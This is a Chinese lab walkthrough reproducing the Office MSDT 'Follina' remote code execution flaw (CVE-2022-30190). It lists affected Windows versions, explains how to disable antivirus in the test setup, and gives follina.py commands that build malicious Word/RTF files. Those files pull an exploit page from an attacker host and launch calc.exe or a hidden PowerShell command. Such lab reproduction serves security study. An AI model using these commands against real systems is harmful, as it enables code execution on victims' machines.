MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）-Toy模板网

这篇具有很好参考价值的文章主要介绍了MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

漏洞概述

受到影响的产品和版本

漏洞复现

1、搭建靶场

2、攻击复现

一、执行系统程序

二、执行系统命令

修复

漏洞概述

Microsoft Windows Support Diagnostic Tool是美国微软（Microsoft）公司的收集信息以发送给 Microsoft 支持的工具（Windows上的微软支持诊断工具中存在此漏洞）。当从Word等应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞，攻击者通过制作恶意的Office文档，诱导用户在受影响的系统上打开恶意文档后，在宏被禁用的情况下，仍可通过 ms-msdt URI执行任意PowerShell代码，当恶意文件保存为RTF格式时，无需受害者打开文件，即可通过资源管理器中的预览窗格在目标系统上执行任意代码。

受到影响的产品和版本

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 Azure Edition Core Hotpatch

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

漏洞复现

1、搭建靶场

Office的漏洞环境需要在虚拟机（靶机）上运行！

注意：

1、虚拟机要关闭所有杀软！

2、一定要用纯净版的win10（不含有任何office版本的，有的话要先卸载感干净）！！

先安装.NET6.0

再安装Office Tool Plus.exe

如果先安装Office Tool Plus的话，环境不是.NET6.0会显示报错(也可以在这按照提示下载安装.NET6.0)：

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

点是，会自动跳转出链接，并自行下载，如果在30内没自动下载，可手动点击下载入口

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

双击运行安装

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

这回再双击运行Office Tool Plus.exe文件，弹出下面界面说明.NET安装成功了

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

点是

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

点更新

进入后，点部署

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

搜索需要搭建的office

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

部署

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

会有如下显示，在自行下载，等待即可

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

出现如下界面说明安装成功了

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

激活：

安装许可证

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

2、攻击复现

在物理机（攻击机）上解压payload和远控工具。

注意：要关闭杀软，且要把payload放到definder设置的排除项里！

Payload目录原始文件如下（使用的是follina.py-main这个payload）

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

当前目录打开cmd

此脚本使用方法：

$ python .\follina.py -h

usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] -t {rtf,docx} [-u URL] [-H HOST] [-P PORT]

解析：

options:

-h, --help 显示此帮助消息并退出

# 执行一个本地二进制程序

python .\follina.py -t docx -m binary -b \windows\system32\calc.exe

python .\follina.py -t docx -m binary -b \\\\localhost\\c$\\Windows\\System32\\calc.exe

# 在linux上，你可能需要转义反斜杠

python .\follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe

# 从文件共享中执行一个二进制文件(可以用于farm 哈希)

python .\follina.py -t docx -m binary -b \\localhost\c$\windows\system32\calc.exe

# 执行任意powershell命令

python .\follina.py -t rtf -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# 在默认接口(所有接口，0.0.0.0)上运行web服务器，但告诉恶意文档在http://1.2.3.4/exploit.html上检索它

python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# 只在本地主机上运行webserver，在端口8080而不是80上运行

python .\follina.py -t rtf -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

一、执行系统程序

使用脚本创建一个含有溢出攻击的word文档（我是两台机器分开的，所以用的远程连接）（我用管理员身份运行的）

python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 192.168.203.1

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

注意，当前机器若有杀软，会检测到并自行删除，要立刻找回文件

新生成的文件如下：

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

可用靶机的浏览器访问IP看是否能正常访问网站

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

把 MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）这个文件放入靶机

在靶机上双击运行，什么都不用做，等待即可，会弹出计算器：

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

此时攻击机会自动出数据：

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）

二、执行系统命令

# 执行任意powershell命令

python .\follina.py -t rtf -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'" -u 192.168.203.1

建里连接，并生成rtf文件

MICROSOFT OFFICE MSDT操作系统命令注入漏洞（CVE-2022-30190）